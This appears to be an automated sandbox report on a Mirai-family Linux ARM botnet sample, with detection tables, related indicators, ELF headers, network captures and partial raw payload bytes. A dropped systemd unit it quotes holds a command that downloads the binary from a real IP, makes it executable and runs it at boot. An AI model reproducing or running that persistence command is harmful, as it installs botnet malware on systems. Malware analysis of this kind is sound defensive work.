behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588850 Sample: 5.elf Startdate: 11/01/2025 Architecture: LINUX Score: 56 37 103.136.41.100, 50808, 80 AGPL-AS-APApeironGlobalPvtLtdIN India 2->37 39 daisy.ubuntu.com 2->39 43 Multi AV Scanner detection for submitted file 2->43 8 systemd bash 2->8         started        10 5.elf 2->10         started        13 xfce4-panel wrapper-2.0 2->13         started        15 6 other processes 2->15 signatures3 process4 signatures5 17 bash rm 8->17         started        20 bash wget 8->20         started        23 bash 5 8->23         started        29 2 other processes 8->29 45 Sample tries to kill multiple processes (SIGKILL) 10->45 25 5.elf sh 10->25         started        27 5.elf sh 10->27         started        process6 file7 41 Sample deletes itself 17->41 35 /tmp/5, ELF 20->35 dropped 31 sh systemctl 25->31         started        33 sh systemctl 27->33         started        signatures8 process9

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
5.elf39%ReversingLabsLinux.Trojan.Mirai
SourceDetectionScannerLabelLink
/tmp/539%ReversingLabsLinux.Trojan.Mirai
No Antivirus matches
SourceDetectionScannerLabelLink
http://103.136.41.100/5100%Avira URL Cloudmalware
NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    http://103.136.41.100/5false
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://%d.%d.%d.%d/%s5.42.drfalse
      high
      http://1/wget.sh5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmpfalse
        high
        http://schemas.xmlsoap.org/soap/encoding/5.42.drfalse
          high
          http://9/curl.sh5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmpfalse
            high
            http://%d.%d.%d.%d/2;5.elf, 5.42.drfalse
              high
              http://schemas.xmlsoap.org/soap/envelope/5.42.drfalse
                high
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                103.136.41.100
                unknownIndia
                139884AGPL-AS-APApeironGlobalPvtLtdINfalse
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                103.136.41.1003.elfGet hashmaliciousUnknownBrowse
                • 103.136.41.100/3
                4.elfGet hashmaliciousUnknownBrowse
                • 103.136.41.100/4
                dlr.mips.elfGet hashmaliciousUnknownBrowse
                • 127.0.0.1/12
                dlr.arm7.elfGet hashmaliciousUnknownBrowse
                • 127.0.0.1/6
                dlr.mpsl.elfGet hashmaliciousUnknownBrowse
                • 127.0.0.1/2
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                daisy.ubuntu.comPOWERPC.elfGet hashmaliciousUnknownBrowse
                • 162.213.35.24
                MIPS.elfGet hashmaliciousUnknownBrowse
                • 162.213.35.24
                ssl.elfGet hashmaliciousGafgytBrowse
                • 162.213.35.24
                ssb.elfGet hashmaliciousGafgytBrowse
                • 162.213.35.25
                ssg.elfGet hashmaliciousGafgytBrowse
                • 162.213.35.25
                qbfwdbg.elfGet hashmaliciousUnknownBrowse
                • 162.213.35.24
                ssh.elfGet hashmaliciousGafgytBrowse
                • 162.213.35.25
                UnHAnaAW.m68k.elfGet hashmaliciousMiraiBrowse
                • 162.213.35.24
                UnHAnaAW.mips.elfGet hashmaliciousMiraiBrowse
                • 162.213.35.24
                UnHAnaAW.spc.elfGet hashmaliciousMiraiBrowse
                • 162.213.35.25
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                AGPL-AS-APApeironGlobalPvtLtdIN3.elfGet hashmaliciousUnknownBrowse
                • 103.136.41.100
                dlr.mips.elfGet hashmaliciousUnknownBrowse
                • 103.136.41.100
                dlr.arm7.elfGet hashmaliciousUnknownBrowse
                • 103.136.41.100
                dlr.mpsl.elfGet hashmaliciousUnknownBrowse
                • 103.136.41.100
                2461ACFA271F7D477CA53ABE428D6ADDE1F285E115F18.exeGet hashmaliciousFFDroiderBrowse
                • 103.136.41.162
                wYWdigdSjn.exeGet hashmaliciousNeshtaBrowse
                • 103.136.42.153
                38b2c7a1af454d382927f81543d86055886bc02863457.exeGet hashmaliciousUnknownBrowse
                • 103.136.42.153
                l39HA25qjw.exeGet hashmaliciousManusCrypt, SocelarsBrowse
                • 103.136.42.153
                SecuriteInfo.com.Win32.Malware-gen.30674.exeGet hashmaliciousUnknownBrowse
                • 103.136.42.153
                file.exeGet hashmaliciousFFDroiderBrowse
                • 103.136.42.153
                No context
                No context
                Process:/tmp/5.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):289
                Entropy (8bit):5.20550551858566
                Encrypted:false
                SSDEEP:6:z8KbX9RZAMGCk4vEuIACLm+fOAkjF5CowzzQEsCBLQmWA4Rv:zb9RZADJiIE+m7qowXQWLHWrv
                MD5:56F063ADE41281D6A0E85EC130A90801
                SHA1:C0CFF3B5D09F8269A5D8D897F769D98E98DF6B64
                SHA-256:D7D4F94CC424065389C63AEF5E3DD56E5914DF8B8CC5761E1878E4AEA544D3AA
                SHA-512:56FE3EC635E80C088AD0AE7B32497AE195BB746507C0C3ECD8C3AE418AC96461EA8925A3597FADB9CBF920AD99D1930AECA7C4CDBBDF0E549524721718B03F30
                Malicious:false
                Reputation:low
                Preview:[Unit].Description=hi.After=network.target..[Service].RemainAfterExit=true.TimeoutSec=30s.Restart=no.ExecStart=/bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;".Type=forking..[Install].WantedBy=multi-user.target.
                Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                File Type:ASCII text
                Category:dropped
                Size (bytes):76
                Entropy (8bit):3.7627880354948586
                Encrypted:false
                SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                MD5:D86A1F5765F37989EB0EC3837AD13ECC
                SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                Process:/usr/bin/wget
                File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                Category:dropped
                Size (bytes):92028
                Entropy (8bit):6.059129391642973
                Encrypted:false
                SSDEEP:1536:+/n8u+4suCJTOeGvl7aiKlj1yDnpLxMR+8MpipUlwPG3CFnmjSAyUX0v7p6dv:0eNQEiKlaJlwPG3SfAyUX0v7p6
                MD5:40D57A51FFBA8151BF851940D0AD367E
                SHA1:DD2BBF98840D5CFE68E6CDC660C6C25E4DE6DBC9
                SHA-256:C14F6F5A9F774456AEF2319034D9E6B57975164E2BDBF9A4BF178737A3E725C3
                SHA-512:B22D6758823E8726248D3D610F6DBBA6A40AE5B9A297CE76FEB189E6865B7C54B1232835CEEFD2AA6D3F262507935490293E53BEC7EA179111CA79DD038D8984
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 39%
                Reputation:low
                Preview:.ELF..............(.....T...4...te......4. ...(.....................DY..DY...............`...`...`..................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../..d.......`....-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../......`...e...`.................. ... -...-.......-......0.. D..>?..............@-.B...0....S.D............ ..45...0....S.G............ ..-5.. 0....S.J... ........ ..&5..00....S.M...0........ ...5..@0....S.P...@........ ...5..P0....S.S...P........ ...5..`0....S.V...`........ ...5..p0....S.Y...p........ ...5..0....S.\............ ...4..0....S._............ ...4...@..../..........7........... ...4...0....S.............6........... ...4.. 0....S........$....6.. ........ ...4..00....S........4....6..0........ ...4..@0....S........D....6..@........ ...4..P0....S........T....6..P........ ..4..`0....S........d....6..`........ ..4..p0....S........t...6..p........ ..
                File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                Entropy (8bit):6.059129391642973
                TrID:
                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                File name:5.elf
                File size:92'028 bytes
                MD5:40d57a51ffba8151bf851940d0ad367e
                SHA1:dd2bbf98840d5cfe68e6cdc660c6c25e4de6dbc9
                SHA256:c14f6f5a9f774456aef2319034d9e6b57975164e2bdbf9a4bf178737a3e725c3
                SHA512:b22d6758823e8726248d3d610f6dbba6a40ae5b9a297ce76feb189e6865b7c54b1232835ceefd2aa6d3f262507935490293e53bec7ea179111ca79dd038d8984
                SSDEEP:1536:+/n8u+4suCJTOeGvl7aiKlj1yDnpLxMR+8MpipUlwPG3CFnmjSAyUX0v7p6dv:0eNQEiKlaJlwPG3SfAyUX0v7p6
                TLSH:F693FA86F881AA11C6C142B7BD2F055E3306A7A8E2DE7353DD241B64778B95F0F27A07
                File Content Preview:.ELF..............(.....T...4...te......4. ...(.....................DY..DY...............`...`...`..................Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../..d.......`....-.@0....S

                ELF header

                Class:ELF32
                Data:2's complement, little endian
                Version:1 (current)
                Machine:ARM
                Version Number:0x1
                Type:EXEC (Executable file)
                OS/ABI:UNIX - System V
                ABI Version:0
                Entry Point Address:0x8154
                Flags:0x4000002
                ELF Header Size:52
                Program Header Offset:52
                Program Header Size:32
                Number of Program Headers:3
                Section Header Offset:91508
                Section Header Size:40
                Number of Section Headers:13
                Header String Table Index:12
                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                NULL0x00x00x00x00x0000
                .initPROGBITS0x80940x940x100x00x6AX004
                .textPROGBITS0x80b00xb00x13f140x00x6AX0016
                .finiPROGBITS0x1bfc40x13fc40x100x00x6AX004
                .rodataPROGBITS0x1bfd40x13fd40x19700x00x2A004
                .eh_framePROGBITS0x260000x160000x40x00x3WA004
                .init_arrayINIT_ARRAY0x260040x160040x40x00x3WA004
                .fini_arrayFINI_ARRAY0x260080x160080x40x00x3WA004
                .gotPROGBITS0x260100x160100x740x40x3WA004
                .dataPROGBITS0x260840x160840x4780x00x3WA004
                .bssNOBITS0x264fc0x164fc0x29b00x00x3WA004
                .ARM.attributesARM_ATTRIBUTES0x00x164fc0x100x00x0001
                .shstrtabSTRTAB0x00x1650c0x670x00x0001
                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                LOAD0x00x80000x80000x159440x159446.12290x5R E0x8000.init .text .fini .rodata
                LOAD0x160000x260000x260000x4fc0x2eac5.98740x6RW 0x8000.eh_frame .init_array .fini_array .got .data .bss
                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                TimestampSource PortDest PortSource IPDest IP
                Jan 11, 2025 06:18:03.733494997 CET3454953192.168.2.131.1.1.1
                Jan 11, 2025 06:18:03.738420010 CET53345491.1.1.1192.168.2.13
                Jan 11, 2025 06:18:03.738480091 CET3454953192.168.2.131.1.1.1
                Jan 11, 2025 06:18:03.738533020 CET3454953192.168.2.131.1.1.1
                Jan 11, 2025 06:18:03.743469000 CET53345491.1.1.1192.168.2.13
                Jan 11, 2025 06:18:03.743513107 CET3454953192.168.2.131.1.1.1
                Jan 11, 2025 06:18:14.664813042 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:14.674068928 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:14.674164057 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:14.676928043 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:14.684148073 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.289175034 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.289251089 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.289290905 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.289328098 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.289364100 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.289361954 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.289361954 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.289361954 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.289402962 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.289438009 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.289453030 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.289453983 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.289453983 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.289475918 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.289486885 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.289510012 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.289549112 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.289556980 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.289556980 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.289587975 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.298974037 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.299010992 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.299030066 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.299067020 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.299245119 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.299278021 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.299302101 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.299345970 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.379168987 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.379218102 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.379281044 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.379348040 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.379370928 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.379370928 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.379385948 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.380099058 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.380139112 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.380177021 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.380184889 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.380916119 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.380954027 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.380991936 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.381786108 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.381829023 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.381865025 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.382590055 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.382633924 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.382671118 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.383425951 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.383440018 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.383455038 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.384265900 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.384280920 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.384294987 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.385063887 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.390892029 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.468894005 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.468934059 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.468945980 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.468985081 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.468985081 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.469363928 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.469381094 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.469396114 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.469933033 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.470201969 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.470216990 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.470232010 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.470237017 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.471045971 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.471062899 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.471076965 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.471899033 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.471915007 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.471929073 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.472717047 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.472732067 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.472744942 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.473551035 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.473566055 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.473578930 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.474461079 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.474474907 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.474488020 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.475240946 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.475255966 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.475267887 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.476100922 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.476129055 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.476142883 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.476859093 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.476882935 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.476900101 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.477744102 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.477761030 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.477775097 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.478596926 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.478614092 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.478627920 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.479816914 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.479835033 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.480145931 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.483700037 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.585272074 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:15.595915079 CET8050808103.136.41.100192.168.2.13
                Jan 11, 2025 06:18:15.595979929 CET5080880192.168.2.13103.136.41.100
                Jan 11, 2025 06:18:19.539427996 CET5644153192.168.2.131.1.1.1
                Jan 11, 2025 06:18:19.549812078 CET53564411.1.1.1192.168.2.13
                Jan 11, 2025 06:18:19.549881935 CET5644153192.168.2.131.1.1.1
                Jan 11, 2025 06:18:19.549942017 CET5644153192.168.2.131.1.1.1
                Jan 11, 2025 06:18:19.565733910 CET53564411.1.1.1192.168.2.13
                Jan 11, 2025 06:18:19.565783024 CET5644153192.168.2.131.1.1.1
                TimestampSource PortDest PortSource IPDest IP
                Jan 11, 2025 06:20:42.783869982 CET4188553192.168.2.131.1.1.1
                Jan 11, 2025 06:20:42.783936024 CET3849953192.168.2.131.1.1.1
                Jan 11, 2025 06:20:42.792577982 CET53418851.1.1.1192.168.2.13
                Jan 11, 2025 06:20:42.792594910 CET53384991.1.1.1192.168.2.13
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Jan 11, 2025 06:20:42.783869982 CET192.168.2.131.1.1.10x923cStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                Jan 11, 2025 06:20:42.783936024 CET192.168.2.131.1.1.10xeedbStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Jan 11, 2025 06:20:42.792577982 CET1.1.1.1192.168.2.130x923cNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                Jan 11, 2025 06:20:42.792577982 CET1.1.1.1192.168.2.130x923cNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
                • 103.136.41.100
                Session IDSource IPSource PortDestination IPDestination Port
                0192.168.2.1350808103.136.41.10080
                TimestampBytes transferredDirectionData
                Jan 11, 2025 06:18:14.676928043 CET154OUTGET /5 HTTP/1.1
                User-Agent: Wget/1.20.3 (linux-gnu)
                Accept: */*
                Accept-Encoding: identity
                Host: 103.136.41.100
                Connection: Keep-Alive
                Jan 11, 2025 06:18:15.289175034 CET711INHTTP/1.1 200 OK
                Accept-Ranges: bytes
                Content-Length: 92028
                Content-Type: application/octet-stream
                Last-Modified: Sat, 11 Jan 2025 03:30:45 GMT
                Date: Sat, 11 Jan 2025 05:18:15 GMT
                Data Raw: 7f 45 4c 46 01 01 01 00 00 00 00 00 00 00 00 00 02 00 28 00 01 00 00 00 54 81 00 00 34 00 00 00 74 65 01 00 02 00 00 04 34 00 20 00 03 00 28 00 0d 00 0c 00 01 00 00 00 00 00 00 00 00 80 00 00 00 80 00 00 44 59 01 00 44 59 01 00 05 00 00 00 00 80 00 00 01 00 00 00 00 60 01 00 00 60 02 00 00 60 02 00 fc 04 00 00 ac 2e 00 00 06 00 00 00 00 80 00 00 51 e5 74 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 00 00 00 04 00 00 00 0d c0 a0 e1 f0 df 2d e9 04 b0 4c e2 f0 af 1b e9 00 00 00 00 00 00 00 00 00 00 00 00 10 40 2d e9 2c 40 9f e5 00 30 d4 e5 00 00 53 e3 06 00 00 1a 20 30 9f e5 00 00 53 e3 1c 00 9f 15 0f e0 a0 11 13 ff 2f 11 01 30 a0 e3 00 30 c4 e5 10 40 bd e8 1e ff 2f e1 fc 64 02 00 00 00 00 00 00 60 02 00 04 e0 2d e5 40 30 9f e5 00 00 53 e3 04 d0 4d e2 38 00 9f 15 38 10 9f 15 0f e0 a0 11 13 ff 2f 11 30 00 9f e5 00 30 90 e5 00 00 53 e3 03 00 00 0a 24 30 9f e5 00 00 53 e3 0f e0 a0 11 13 ff 2f 11 04 d0 8d e2 04 e0 9d e4 1e ff 2f e1 00 00 00 00 00 60 02 00 00 65 02 00 0c 60 02 00 00 00 [TRUNCATED]
                Data Ascii: ELF(T4te4 (DYDY```.Qtd-L@-,@0S 0S/00@/d`-@0SM88/00S$0S//`e` ---0 D>?@-B0SD 450SG -5 0SJ &500SM0
                Jan 11, 2025 06:18:15.289251089 CET1236INData Raw: 10 20 a0 e3 1f 35 00 eb 40 30 94 e5 00 00 53 e3 50 00 00 1a 40 00 84 e2 00 10 a0 e3 10 20 a0 e3 18 35 00 eb 50 30 94 e5 00 00 53 e3 53 00 00 1a 50 00 84 e2 00 10 a0 e3 10 20 a0 e3 11 35 00 eb 60 30 94 e5 00 00 53 e3 56 00 00 1a 60 00 84 e2 00 10
                Data Ascii: 5@0SP@ 5P0SSP 5`0SV` 5p0SYp 50S\ 40S_ 4@/7 40S6
                Jan 11, 2025 06:18:15.289290905 CET1236INData Raw: 64 30 9f e5 00 20 93 e5 00 c0 92 e5 04 30 dc e5 07 00 53 e1 06 00 a0 11 04 00 00 1a 08 00 00 ea 00 c1 92 e7 04 30 dc e5 07 00 53 e1 04 00 00 0a 01 00 80 e2 01 00 50 e1 f8 ff ff 1a 00 00 a0 e3 27 40 00 eb 0a 00 a0 e1 05 10 a0 e1 08 20 a0 e1 24 30
                Data Ascii: d0 0S0SP'@ $0/eeO-Q$M$O/!<, 44\0\0X1 L0R:
                Jan 11, 2025 06:18:15.289328098 CET484INData Raw: 08 00 a0 e1 00 30 c4 e5 00 20 86 e5 45 3a 00 eb 00 10 d4 e5 28 22 9f e5 00 50 a0 e1 04 30 a0 e3 08 10 81 e0 00 00 96 e5 00 20 85 e5 04 30 c5 e5 01 11 a0 e1 88 3a 00 eb 00 30 d4 e5 00 20 a0 e1 03 51 80 e7 08 10 a0 e3 08 30 83 e0 08 00 a0 e1 00 30
                Data Ascii: 0 E:("P0 0:0 Q00 2:!P0 0u:0 Q00 :!P0 0b:0 Q00 :
                Jan 11, 2025 06:18:15.289364100 CET1236INData Raw: 00 10 d4 e5 78 20 9f e5 00 50 a0 e1 09 30 a0 e3 08 10 81 e0 00 00 96 e5 00 20 85 e5 04 30 c5 e5 01 11 a0 e1 16 3a 00 eb 00 30 d4 e5 00 00 86 e5 03 51 80 e7 08 20 83 e0 08 00 a0 e1 00 20 c4 e5 f0 41 bd e8 1e ff 2f e1 18 65 02 00 1c 65 02 00 90 ba
                Data Ascii: x P0 0:0Q A/eedD<dO-M@P9, @0800C 80C
                Jan 11, 2025 06:18:15.289402962 CET1236INData Raw: 01 00 80 e0 70 20 10 e5 02 28 a0 e1 22 34 a0 e1 ff 3c 03 e2 22 3c 83 e1 be 30 c6 e1 18 20 a0 e3 69 0f 87 e2 ab 10 8d e2 b9 30 00 eb 0c 30 d6 e5 40 30 c3 e3 b0 30 83 e3 0c 30 c6 e5 c4 20 9d e5 01 40 82 e2 04 00 59 e1 c4 40 8d e5 64 00 00 da 5e 0e
                Data Ascii: p ("4<"<0 i00@000 @Y@d^8,0 q00@00 H 0@ \0 `F0#!%!* c0#2" cbd
                Jan 11, 2025 06:18:15.289438009 CET1236INData Raw: 0d 00 90 e8 01 00 00 e2 01 20 02 e2 01 30 03 e2 01 60 06 e2 4c c0 8d e5 18 00 8d e5 1c 20 8d e5 20 30 8d e5 24 60 8d e5 0e 40 a0 e1 01 10 a0 e3 80 00 a0 e3 61 37 00 eb 54 10 9d e5 04 01 88 e7 01 51 98 e7 00 30 d5 e5 b0 30 c3 e3 40 30 83 e3 00 30
                Data Ascii: 0`L 0$`@a7TQ00@00 @ H 2 1C0 0 1 @0 020 0 " 0010
                Jan 11, 2025 06:18:15.289475918 CET1236INData Raw: 04 00 a0 e1 52 fa ff eb 08 24 9f e5 05 10 a0 e1 00 30 92 e5 00 60 a0 e1 03 20 a0 e3 04 00 a0 e1 30 fa ff eb 03 10 a0 e3 40 00 8d e5 06 20 a0 e3 02 00 a0 e3 55 33 00 eb 01 00 70 e3 00 90 a0 e1 f1 00 00 0a 50 30 8d e2 01 20 a0 e3 04 20 23 e5 04 c0
                Data Ascii: R$0` 0@ U3pP0 # 93p(0 (ZL< ,x $ (<#8 , 0040 `D0
                Jan 11, 2025 06:18:15.289510012 CET388INData Raw: 00 30 a0 e3 04 00 a0 e1 1f f9 ff eb 05 10 a0 e1 3c 00 8d e5 0c 20 a0 e3 00 30 a0 e3 04 00 a0 e1 19 f9 ff eb 05 10 a0 e1 40 00 8d e5 0d 20 a0 e3 00 30 a0 e3 04 00 a0 e1 13 f9 ff eb 05 10 a0 e1 00 20 a0 e3 02 3c a0 e3 00 60 a0 e1 04 00 a0 e1 0d f9
                Data Ascii: 0< 0@ 0 <` 0#0 T 2pD`0 # 1pW@,.(8\@HL
                Jan 11, 2025 06:18:15.289549112 CET1236INData Raw: 24 60 8d e5 50 20 8d e5 5e 0e a0 e3 01 10 a0 e3 06 00 80 e2 a7 34 00 eb 2c 30 9d e5 5c 20 9d e5 04 01 83 e7 02 41 93 e7 00 30 d4 e5 b0 30 c3 e3 40 30 83 e3 00 30 c4 e5 00 20 d4 e5 0a 20 c2 e3 00 50 a0 e3 05 20 82 e3 00 20 c4 e5 01 50 c4 e5 b2 a0
